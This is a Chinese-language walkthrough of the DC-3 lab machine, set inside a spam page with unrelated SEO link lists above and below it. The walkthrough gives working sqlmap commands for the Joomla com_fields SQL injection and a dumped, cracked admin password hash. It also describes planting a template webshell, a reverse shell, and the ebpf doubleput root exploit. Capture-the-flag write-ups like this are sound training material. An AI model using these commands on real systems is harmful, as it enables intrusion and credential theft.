当前位置: 首页 > news >正文

浏览收费网站模板住房城乡建设部网站文件查询

浏览收费网站模板,住房城乡建设部网站文件查询,建设wap手机网站制作,一键免费创建论坛网站啰嗦两句: 提权之前完成是一个月前做的,当时在提权处出了点问题就搁置了,今天才完成,所以IP地址可能会会有变化 注意:后续出现的IP地址为192.168.200.55同样是靶机IP地址,若本文能有帮助到你的地方&#xf…
啰嗦两句:
提权之前完成是一个月前做的,当时在提权处出了点问题就搁置了,今天才完成,所以IP地址可能会会有变化
注意:后续出现的IP地址为192.168.200.55同样是靶机IP地址,若本文能有帮助到你的地方,不胜荣幸。

一、搭建环境

1.工具

攻击机:kali(192.168.200.14)
靶机:DC-3 (未知)

2.注意

攻击机和靶机的网络连接方式要相同,另外DC-1的网络连接方式我这里采用NAT模式,是与kali的网络连接模式相同的(当然亦可以选用桥接模式)

DC-1网络设计
点击高级后可以查看DC-1的靶机MAC地址,便于扫描IP时识别

二、信息收集

1.扫描同网段下的存活主机方法

靶机dc-3的MAC地址,根据MAC地址判断IP地址
image.png
其一:

arp-scan -l 

image.png
其二:

nmap -sP 192.168.200.0/24 -T4

image.png
其三:

natdiscover 

image.png

2.扫描目标IP开放端口

nmap -sV -p- 192.168.200.8 
#-sV  扫描目标主机端口上运行的软件信息
#-p-  扫描全部端口0-65535

image.png
可以看到此站点,只开启了80端口

3.扫描后台目录

利用dirsearch工具,可与看到administrator这个目录,应该是后台
image.png

4.指纹收集

登录网站
一个著名的CMS系统
image.png
左侧的英文翻译为:
这一次,只有1个flag,一个切入点,没有任何线索。 要获得该标志,您显然必须获得root权限(提权)。 你如何成为根取决于你——显然,还有系统。 祝你好运,我希望你喜欢这个小挑战 。

使用joomscan进行扫描

joomscan -u http://192.168.200.8/

joomscan 安装方法

sudo apt-get install joomscan

image.png
一般的:可以根据框架版本去百度搜索它相关的漏洞,先登录后台目录
image.png
百度搜索后,可以发现千篇一律的sql漏洞
image.png
利用KILI工具查找漏洞
image.png
查看文件、
image.png

5.后台爆破

image.png
sqlmap列出数据库库名
sqlmap -u “http://192.168.200.8/index.php ?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
根据提供的SQLmap构建的payload

image.png

sqlmap列出数据库joomladb下的所有表名
sqlmap -u “http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” --tables -p list[fullordering]
image.png
发现#_users表
列出users表的字段类型
sqlmap -u “http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]
#__users 里的信息
image.png
确定账户名 账号密码一般为“username,password”
爆数据
sqlmap -u “http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --dbms mysql -D joomladb -T ‘#__users’ -C id,name,password,username --dump
image.png

 $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #哈希加密

使用kali中的join工具进行解密

vi admin.txt      #编辑 将密文写入
john admin.txt    #破解

image.png
破解后得到登录密码为:snoopy 账号:admin
登录后台
image.png

三、漏洞探测

上传Webshell

可以找到网站源码,而模板里的php文件可编辑。
image.png
Joomla后台可编辑模板,利用这个功能,在template下面创建一个 test.php,写入一句话,蚁剑成功连接

image.png

image.png

image.png
当时上传一句话木马的路径如下,此时是可以浏览网站目录和打开虚拟终端的。
image.png

image.png
模板问及那所在路径(直接访问当前文件夹,均可以获取当前文件夹的内容)

http://192.168.200.8/templates/beez3/html/

image.png

反弹shell

在/templates/beez3模板里上传一个反弹shell的文件,记住上传路径,文件由自己创建,本文的文件名shell.php
image.png

反弹shell成功
image.png

利用EXP

searchsploit工具查找Ubuntu 16.04的提权,发现一个“拒绝服务漏洞”,可以用来提权

searchsploit ubuntu 16.04

image.png
查看漏洞,下载EXP

cp /usr/share/exploitdb/exploits/linux/local/39772.txt  shell.txt
cat shelll.txt

文件内容提供了EXP网址
image.png

下载(这步在靶机中实现,这步骤操作失误)
image.png
解压文件

unzip 39772.zip  #解压29772.zip文件
cd 39772
tar -xvf exploit.tar  #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit

image.png
image.png
image.png

提权

编译代码

./compile.sh   #执行脚本,编译文件

image.png
提权,获取root权限

./doubleput  #执行提权文件

略微等待一会儿
image.png
image.png

文章参考:https://blog.csdn.net/weixin_43583637/article/details/101554815

http://www.yayakq.cn/news/298526/

相关文章:

  • 诀窍的网站购物网站有哪些功能
  • 建材行业网站建设国内永久免费的crm系统软件
  • 去哪里找做网站长沙房地产管理局
  • 南宁江南区网站制作价格wordpress 发布vr
  • 神马网站快速排名案例网站简繁体转换 js
  • 河南免费网站建设公司推荐替换wordpress头像源
  • 收到一张网站服务费怎么做凭证下关汇做网站的公司
  • 网站赌场怎么做代理wordpress wti like post
  • 南沙做网站要多少钱最好的看vr影片的设备是哪个
  • 网站建设运营公司推荐济南学习做网站
  • 国产安卓开发工具seo百度百科
  • 做盗版小说网站赚钱嘛wordpress免邮箱 注册
  • 柒零叁网站建设湖南长沙做网站首页的图片素材
  • 最好的网站开发系统多多进宝cms网站建设
  • 网站建设计入什么科目个人可以做网站导航
  • 太原做网站找谁东莞市建筑业协会
  • 网站建设选择云主机吗机刷推广软件
  • 黄页网站软件应用大全江苏网站seo平台
  • 您身边的网站建设顾问dns加网站
  • 分类信息网站建设多少钱wordpress 图片自述
  • v6厂高仿手表网站成都画册设计的公司
  • 市住房和城乡建设局网站大连金宝贝早教中心网页界面设计
  • 外链推广网站网站建设需求统计表
  • 做网站最好用的软件网站设计制作费
  • 郑州 手机网站js网站文字重叠
  • 太原推广型网站开发个人备案网站
  • 网站建设有前途吗网站维护工作内容有什么
  • 英文营销型网站建设网站建设营销的公司
  • 江苏聚峰建设集团网站网站建设常州麦策电商
  • 镇平微网站开发公司视频宣传片